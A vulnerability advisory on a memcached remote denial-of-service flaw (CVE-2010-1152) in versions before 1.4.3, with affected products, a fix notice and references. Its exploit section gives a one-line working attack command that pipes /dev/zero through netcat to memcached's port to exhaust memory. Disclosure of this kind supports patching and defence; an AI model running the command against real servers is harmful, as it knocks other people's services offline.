BID:39577

memcached Memory Consumption Remote Denial of Service Vulnerability

Info

memcached Memory Consumption Remote Denial of Service Vulnerability

Bugtraq ID:	39577
Class:	Unknown
CVE:	CVE-2010-1152
Remote:	Yes
Local:	No
Published:	Oct 27 2009 12:00AM
Updated:	Mar 19 2015 08:51AM
Credit:	fallenpegasus
Vulnerable:	SuSE SUSE Linux Enterprise Desktop 10 SP1 SuSE SUSE Linux Enterprise 11 Sun Solaris 11 Express snv_151a Sun Solaris 11 Express Pardus Linux 2009 0 Memcached memcached 1.4.2

Not Vulnerable:	Memcached memcached 1.4.3

Discussion

memcached Memory Consumption Remote Denial of Service Vulnerability

memcached is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the application to allocate large amount of memory, hanging or crashing the application.

memcached versions prior to 1.4.3 are affected.

Exploit / POC

memcached Memory Consumption Remote Denial of Service Vulnerability

The following exploit is available:

cat /dev/zero | nc -q1 127.0.0.1 11211

Solution / Fix

memcached Memory Consumption Remote Denial of Service Vulnerability

Solution:
Updates are available. Please see the references for more information.

References

memcached Memory Consumption Remote Denial of Service Vulnerability

References:

Bug 12672 - memcached: Denial of Service via a Long Line (CVE-2010-1152) (Pardus)
Commit 75cc83685e103bc8ba380a57468c8f04413033f9 to memcached's memcached (Memcached)
Commit d9cd01ede97f4145af9781d448c62a3318952719 to memcached's memcached (Memcached)
Input Validation Vulnerability in Memcached (Oracle)
Issue 102: PIping null to the server will crash it (Memcached)
Zarafa Homepage (Zarafa)